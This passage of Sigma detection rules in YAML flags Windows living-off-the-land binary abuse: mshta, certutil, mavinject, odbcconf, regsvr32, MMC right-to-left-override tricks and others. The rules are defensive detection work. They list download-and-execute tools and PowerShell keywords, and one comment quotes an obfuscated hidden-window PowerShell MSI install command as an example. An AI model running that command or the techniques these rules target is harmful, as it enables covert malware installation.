            - '\hh.exe'
            - '\finger.exe'
        TargetFilename|endswith:
            - '.ps1'
            - '.bat'
            - '.vbs'
            - '.scf'
            - '.wsf'
            - '.wsh'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Legitimate Application Writing Files In Uncommon Location
id: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67
related:
    - id: 2ddef153-167b-4e89-86b6-757a9e65dcac # bitsadmin dedicated rule
      type: similar
status: experimental
description: |
    Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution.
    Adversaries may leverage legitimate applications (Living off the Land Binaries - LOLBins) to drop or download malicious files to uncommon locations on the system to evade detection by security solutions.
references:
    - https://lolbas-project.github.io/#/download
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-12-10
tags:
    - attack.stealth
    - attack.t1218
    - attack.command-and-control
    - attack.t1105
logsource:
    product: windows
    category: file_event
detection:
    selection_img:
        Image|endswith:
            # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4
            - '\eqnedt32.exe'
            - '\wordpad.exe'
            - '\wordview.exe'
            # LOLBINs that can be used to download executables
            - '\cmdl32.exe'
            - '\certutil.exe'
            - '\certoc.exe'
            - '\CertReq.exe'
            - '\bitsadmin.exe'
            - '\Desktopimgdownldr.exe'
            - '\esentutl.exe'
            - '\expand.exe'
            - '\extrac32.exe'
            - '\replace.exe'
            - '\mshta.exe'
            - '\ftp.exe'
            - '\Ldifde.exe'
            - '\RdrCEF.exe'
            - '\hh.exe'
            - '\finger.exe'
            - '\findstr.exe'
    selection_locations:
        TargetFilename|contains:
            - ':\Perflogs'
            - ':\ProgramData\'
            - ':\Temp\'
            - ':\Users\Public\'
            - ':\Windows\'
            - '\$Recycle.Bin\'
            - '\AppData\Local\'
            - '\AppData\Roaming\'
            - '\Contacts\'
            - '\Desktop\'
            - '\Favorites\'
            - '\Favourites\'
            - '\inetpub\wwwroot\'
            - '\Music\'
            - '\Pictures\'
            - '\Start Menu\Programs\Startup\'
            - '\Users\Default\'
            - '\Videos\'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
regression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/info.yml

title: MMC Executing Files with Reversed Extensions Using RTLO Abuse
id: 9cfe4b27-1e56-48b4-b7a8-d46851c91a44
status: experimental
description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
references:
    - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf
    - https://en.wikipedia.org/wiki/Right-to-left_override
    - https://tria.ge/241015-l98snsyeje/behavioral2
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-02-05
tags:
    - attack.execution
    - attack.stealth
    - attack.t1204.002
    - attack.t1218.014
    - attack.t1036.002
logsource:
    category: process_creation
    product: windows
detection:
    selection_image:
        - Image|endswith: '\mmc.exe'
        - OriginalFileName: 'MMC.exe'
    selection_commandline:
        CommandLine|contains: # While looking at these files the prefix of their name will look something like csm.pdf, but in reality it is msc file
            - 'cod.msc'  # Reversed `.doc`
            - 'fdp.msc'  # Reversed `.pdf`
            - 'ftr.msc'  # Reversed `.rtf`
            - 'lmth.msc'  # Reversed `.html`
            - 'slx.msc'  # Reversed `.xls`
            - 'tdo.msc'  # Reversed `.odt`
            - 'xcod.msc'  # Reversed `.docx`
            - 'xslx.msc'  # Reversed `.xlsx`
            - 'xtpp.msc'  # Reversed `.pptx`
    condition: all of selection_*
falsepositives:
    - Legitimate administrative actions using MMC to execute misnamed `.msc` files.
    - Unconventional but non-malicious usage of RLO or reversed extensions.
level: high

title: MSDT Execution Via Answer File
id: 9c8c7000-3065-44a8-a555-79bcba5d9955
status: test
description: |
    Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Msdt/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-13
modified: 2025-10-29
tags:
    - attack.stealth
    - attack.t1218
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\msdt.exe'
        CommandLine|contains: '\WINDOWS\diagnostics\index\PCWDiagnostic.xml'
        CommandLine|contains|windash: ' -af '
    filter_main_pcwrun:
        ParentImage|endswith: '\pcwrun.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Possible undocumented parents of "msdt" other than "pcwrun".
level: high

title: MSHTA Execution with Suspicious File Extensions
id: cc7abbd0-762b-41e3-8a26-57ad50d2eea3
status: test
description: |
    Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content,
    such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
    containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and
    execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
references:
    - http://blog.sevagas.com/?Hacking-around-HTA-files
    - https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356
    - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script
    - https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997
    - https://twitter.com/mattifestation/status/1326228491302563846
    - https://www.virustotal.com/gui/file/c1f27d9795a2eba630db8a043580a0761798f06370fb1317067805f8a845b00c
author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2019-02-22
modified: 2025-05-12
tags:
    - attack.stealth
    - attack.t1140
    - attack.t1218.005
    - attack.execution
    - attack.t1059.007
    - cve.2020-1599
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\mshta.exe'
        - OriginalFileName: 'mshta.exe'
    selection_cli:
        CommandLine|contains:
            - '.7z'
            - '.avi'
            - '.bat'
            - '.bmp'
            - '.conf'
            - '.csv'
            - '.dll'
            - '.doc'
            - '.gif'
            - '.gz'
            - '.ini'
            - '.jpe'
            - '.jpg'
            - '.json'
            - '.lnk'
            - '.log'
            - '.mkv'
            - '.mp3'
            - '.mp4'
            - '.pdf'
            - '.png'
            - '.ppt'
            - '.rar'
            - '.rtf'
            - '.svg'
            - '.tar'
            - '.tmp'
            - '.txt'
            - '.xls'
            - '.xml'
            - '.yaml'
            - '.yml'
            - '.zip'
            - 'vbscript'
            # - '.chm'  # could be prone to false positives
            # - '.exe'
    condition: all of selection_*
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: high

title: Mavinject Inject DLL Into Running Process
id: 4f73421b-5a0b-4bbf-a892-5a7fb99bea66
related:
    - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
      type: obsolete
status: test
description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md
    - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e
    - https://twitter.com/gN3mes1s/status/941315826107510784
    - https://reaqta.com/2017/12/mavinject-microsoft-injector/
    - https://twitter.com/Hexacorn/status/776122138063409152  # Deleted tweet
    - https://github.com/SigmaHQ/sigma/issues/3742
    - https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection
author: frack113, Florian Roth
date: 2021-07-12
modified: 2022-12-05
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055.001
    - attack.t1218.013
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: ' /INJECTRUNNING '
    filter:
        ParentImage: 'C:\Windows\System32\AppVClient.exe' # This parent is the expected process to launch "mavinject"
    condition: selection and not filter
falsepositives:
    - Unknown
level: high

title: MpiExec Lolbin
id: 729ce0ea-5d8f-4769-9762-e35de441586d
status: test
description: Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary
references:
    - https://twitter.com/mrd0x/status/1465058133303246867
    - https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps
author: Florian Roth (Nextron Systems)
date: 2022-01-11
modified: 2024-11-23
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_binary:
        - Image|endswith: '\mpiexec.exe'
        - Hashes|contains: 'IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217'
    selection_flags:
        CommandLine|contains:
            - ' /n 1 '
            - ' -n 1 '
    condition: all of selection*
falsepositives:
    - Unknown
level: high

title: Network Connection Initiated By AddinUtil.EXE
id: 5205613d-2a63-4412-a895-3a2458b587b3
status: test
description: |
    Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe".
    This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
references:
    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023-09-18
modified: 2024-07-16
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        Image|endswith: '\addinutil.exe'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Obfuscated PowerShell MSI Install via WindowsInstaller COM
id: 7b6a7418-3afc-11f0-aff4-000d3abf478c
status: experimental
description: |
    Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
    The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
    malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
    by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
    hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
references:
    - https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/
    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/
    - https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457
author: Meroujan Antonyan (vx3r)
date: 2025-05-27
tags:
    - attack.stealth
    - attack.t1027.010
    - attack.t1218.007
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    # Example: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://example.com/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')";
    selection_img:
        - Image|endswith:
              - '\powershell_ise.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell_ISE.EXE'
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_cli:
        CommandLine|contains|all:
            - '-ComObject'
            - 'InstallProduct('
            - '.Insert('
            - 'UILevel'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high

title: Odbcconf.EXE Suspicious DLL Location
id: 6b65c28e-11f3-46cb-902a-68f2cafaf474
status: test
description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
references:
    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16
    - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html
    - https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-22
modified: 2023-05-26
tags:
    - attack.stealth
    - attack.t1218.008
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\odbcconf.exe'
        - OriginalFileName: 'odbcconf.exe'
    selection_cli:
        # Note: Add more suspicious locations
        CommandLine|contains:
            - ':\PerfLogs\'
            - ':\ProgramData\'
            - ':\Temp\'
            - ':\Users\Public\'
            - ':\Windows\Registration\CRMLog'
            - ':\Windows\System32\com\dmp\'
            - ':\Windows\System32\FxsTmp\'
            - ':\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\'
            - ':\Windows\System32\spool\drivers\color\'
            - ':\Windows\System32\spool\PRINTERS\'
            - ':\Windows\System32\spool\SERVERS\'
            - ':\Windows\System32\Tasks_Migrated\'
            - ':\Windows\System32\Tasks\Microsoft\Windows\SyncCenter\'
            - ':\Windows\SysWOW64\com\dmp\'
            - ':\Windows\SysWOW64\FxsTmp\'
            - ':\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System\'
            - ':\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter\'
            - ':\Windows\Tasks\'
            - ':\Windows\Temp\'
            - ':\Windows\Tracing\'
            - '\AppData\Local\Temp\'
            - '\AppData\Roaming\'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high

title: OneNote.EXE Execution of Malicious Embedded Scripts
id: 84b1706c-932a-44c4-ae28-892b28a25b94
status: test
description: |
    Detects the execution of malicious OneNote documents that contain embedded scripts.
    When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
references:
    - https://bazaar.abuse.ch/browse/tag/one/
author: '@kostastsale'
date: 2023-02-02
tags:
    - attack.stealth
    - attack.t1218.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\onenote.exe'
        Image|endswith:
            - '\cmd.exe'
            - '\cscript.exe'
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\wscript.exe'
        CommandLine|contains:
            - '\exported\'
            - '\onenoteofflinecache_files\'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: OpenWith.exe Executes Specified Binary
id: cec8e918-30f7-4e2d-9bfa-a59cc97ae60f
status: test
description: The OpenWith.exe executes other binary
references:
    - https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml
    - https://twitter.com/harr0ey/status/991670870384021504
author: Beyu Denis, oscd.community (rule), @harr0ey (idea)
date: 2019-10-12
modified: 2021-11-27
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\OpenWith.exe'
        CommandLine|contains: '/c'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Outbound Network Connection Initiated By Cmstp.EXE
id: efafe0bf-4238-479e-af8f-797bd3490d2d
status: test
description: |
    Detects a network connection initiated by Cmstp.EXE
    Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
references:
    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-30
modified: 2024-05-31
tags:
    - attack.stealth
    - attack.t1218.003
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Image|endswith: '\cmstp.exe'
        Initiated: 'true'
    filter_main_local_ranges:
        DestinationIp|cidr:
            - '127.0.0.0/8'
            - '10.0.0.0/8'
            - '172.16.0.0/12'
            - '192.168.0.0/16'
            - '169.254.0.0/16'
            - '::1/128'  # IPv6 loopback
            - 'fe80::/10'  # IPv6 link-local addresses
            - 'fc00::/7'  # IPv6 private addresses
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
# Note: Please report any false positive seen in the wild to help tune the rule.
level: high

title: Potential LethalHTA Technique Execution
id: ed5d72a6-f8f4-479d-ba79-02f6a80d7471
status: test
description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process
references:
    - https://codewhitesec.blogspot.com/2018/07/lethalhta.html
author: Markus Neis
date: 2018-06-07
modified: 2023-02-07
tags:
    - attack.stealth
    - attack.t1218.005
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\svchost.exe'
        Image|endswith: '\mshta.exe'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Potential NTLM Coercion Via Certutil.EXE
id: 6c6d9280-e6d0-4b9d-80ac-254701b64916
status: test
description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag
references:
    - https://github.com/LOLBAS-Project/LOLBAS/issues/243
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-01
modified: 2023-02-14
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\certutil.exe'
        - OriginalFileName: 'CertUtil.exe'
    selection_cli:
        CommandLine|contains|all:
            - ' -syncwithWU '
            - ' \\\\'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml

title: Potential PowerShell Execution Via DLL
id: 6812a10b-60ea-420c-832f-dfcc33b646ba
status: test
description: |
    Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.
    This detection assumes that PowerShell commands are passed via the CommandLine.
references:
    - https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md
author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
date: 2018-08-25
modified: 2024-03-07
tags:
    - attack.stealth
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\InstallUtil.exe'
              - '\RegAsm.exe'
              - '\RegSvcs.exe'
              - '\regsvr32.exe'
              - '\rundll32.exe'
        - OriginalFileName:
              - 'InstallUtil.exe'
              - 'RegAsm.exe'
              - 'RegSvcs.exe'
              - 'REGSVR32.EXE'
              - 'RUNDLL32.EXE'
    selection_cli:
        CommandLine|contains:
            - 'Default.GetString'
            - 'DownloadString'
            - 'FromBase64String'
            - 'ICM '
            - 'IEX '
            - 'Invoke-Command'
            - 'Invoke-Expression'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high

title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution
id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25
related:
    - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic
      type: similar
    - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse
      type: similar
    - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry
      type: similar
status: test
description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
    - https://twitter.com/0gtweet/status/1674399582162153472
author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
date: 2023-08-08
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: 'SOFTWARE\Microsoft\Provisioning\Commands\'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG
id: 7021255e-5db3-4946-a8b9-0ba7a4644a69
related:
    - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic
      type: similar
    - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse
      type: similar
    - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry
      type: similar
status: test
description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
    - https://twitter.com/0gtweet/status/1674399582162153472
author: Swachchhanda Shrawan Poudel
date: 2023-08-02
modified: 2023-08-17
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: registry_set
    product: windows
    definition: 'Requirements: The registry key "\SOFTWARE\Microsoft\Provisioning\Commands\" and its subkey must be monitored'
detection:
    selection:
        TargetObject|contains: '\SOFTWARE\Microsoft\Provisioning\Commands\'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Potential RemoteFXvGPUDisablement.EXE Abuse
id: f65e22f9-819e-4f96-9c7b-498364ae7a25
related:
    - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation
      type: similar
    - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module
      type: similar
    - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock
      type: similar
status: test
description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of  the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
    - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2021-07-13
modified: 2023-05-09
tags:
    - attack.stealth
    - attack.t1218
logsource:
    product: windows
    service: powershell-classic
    definition: fields have to be extract from event
detection:
    selection:
        Data|contains: 'ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter {'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module
id: 38a7625e-b2cb-485d-b83d-aff137d859f4
related:
    - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation
      type: similar
    - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic
      type: similar
    - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock
      type: similar
status: test
description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
    - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
author: Nasreddine Bencherchali (Nextron Systems), frack113
date: 2021-07-13
modified: 2023-05-09
tags:
    - attack.stealth
    - attack.t1218
logsource:
    product: windows
    category: ps_module
    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b
detection:
    selection:
        Payload|contains: 'ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter {'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock
id: cacef8fc-9d3d-41f7-956d-455c6e881bc5
related:
    - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation
      type: similar
    - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic
      type: similar
    - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module
      type: similar
status: test
description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
    - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-09
tags:
    - attack.stealth
    - attack.t1218
logsource:
    product: windows
    category: ps_script
    definition: bade5735-5ab0-4aa7-a642-a11be0e40872
detection:
    selection:
        ScriptBlockText|startswith: 'function Get-VMRemoteFXPhysicalVideoAdapter {'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Potential Suspicious Mofcomp Execution
id: 1dd05363-104e-4b4a-b963-196a534b03a1
status: test
description: |
    Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.
    The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
    Attackers abuse this utility to install malicious MOF scripts
references:
    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
    - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml
    - https://learn.microsoft.com/en-us/windows/win32/wmisdk/mofcomp
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
modified: 2023-04-11
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\mofcomp.exe'
        - OriginalFileName: 'mofcomp.exe'
    selection_case:
        - ParentImage|endswith:
              - '\cmd.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
              - '\wsl.exe'
              - '\wscript.exe'
              - '\cscript.exe'
        - CommandLine|contains:
              - '\AppData\Local\Temp'
              - '\Users\Public\'
              - '\WINDOWS\Temp\'
              - '%temp%'
              - '%tmp%'
              - '%appdata%'
    filter_main_wmiprvse:
        ParentImage: 'C:\Windows\System32\wbem\WmiPrvSE.exe'
        CommandLine|contains: 'C:\Windows\TEMP\'
        CommandLine|endswith: '.mof'
    filter_optional_null_parent:
        # Sometimes the parent information isn't available from the Microsoft-Windows-Security-Auditing provider.
        CommandLine|contains: 'C:\Windows\TEMP\'
        CommandLine|endswith: '.mof'
    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: high

title: Potentially Suspicious Child Process Of Regsvr32
id: 6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca
related:
    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
      type: obsolete
status: test
description: Detects potentially suspicious child processes of "regsvr32.exe".
references:
    - https://redcanary.com/blog/intelligence-insights-april-2022/
    - https://www.echotrail.io/insights/search/regsvr32.exe
    - https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo
author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022-05-05
modified: 2023-05-26
tags:
    - attack.stealth
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\regsvr32.exe'
        Image|endswith:
            - '\calc.exe'
            - '\cscript.exe'
            - '\explorer.exe'
            - '\mshta.exe'
            - '\net.exe'
            - '\net1.exe'
            - '\nltest.exe'
            - '\notepad.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\reg.exe'
            - '\schtasks.exe'
            - '\werfault.exe'
            - '\wscript.exe'
    filter_main_werfault:
        Image|endswith: '\werfault.exe'
        CommandLine|contains: ' -u -p '
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unlikely, but can rarely occur. Apply additional filters accordingly.
level: high

title: Potentially Suspicious Child Processes Spawned by ConHost
id: dfa03a09-8b92-4d83-8e74-f72839b1c407
related:
    - id: 7dc2dedd-7603-461a-bc13-15803d132355
      type: similar
status: experimental
description: Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components.
references:
    - https://tria.ge/241015-l98snsyeje/behavioral2
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-02-05
tags:
    - attack.stealth
    - attack.t1202
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\conhost.exe'
    selection_child:
        - Image|endswith:
              - '\cmd.exe'             # Windows Command Prompt
              - '\cscript.exe'         # Windows Script Host (used for scripting exploits)
              - '\mshta.exe'           # MSHTA (HTML Application Host, often abused)
              - '\powershell_ise.exe'  # PowerShell ISE
              - '\powershell.exe'      # Windows PowerShell
              - '\pwsh.exe'            # PowerShell Core
              - '\regsvr32.exe'        # Windows Registry Server (commonly used for exploits)
              - '\wscript.exe'         # Windows Script Host (for executing scripts)
        - OriginalFileName:
              - 'cmd.exe'
              - 'cscript.exe'
              - 'mshta.exe'
              - 'powershell_ise.exe'
              - 'powershell.exe'
              - 'pwsh.dll'
              - 'regsvr32.exe'
              - 'wscript.exe'
    condition: all of selection_*
falsepositives:
    - Legitimate administrative tasks using `conhost.exe` to spawn child processes such as `cmd.exe`, `powershell.exe`, or `regsvr32.exe`.
level: high

title: Potentially Suspicious DLL Registered Via Odbcconf.EXE
id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76
related:
    - id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70
      type: derived
status: test
description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses.
references:
    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16
    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/
    - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-22
tags:
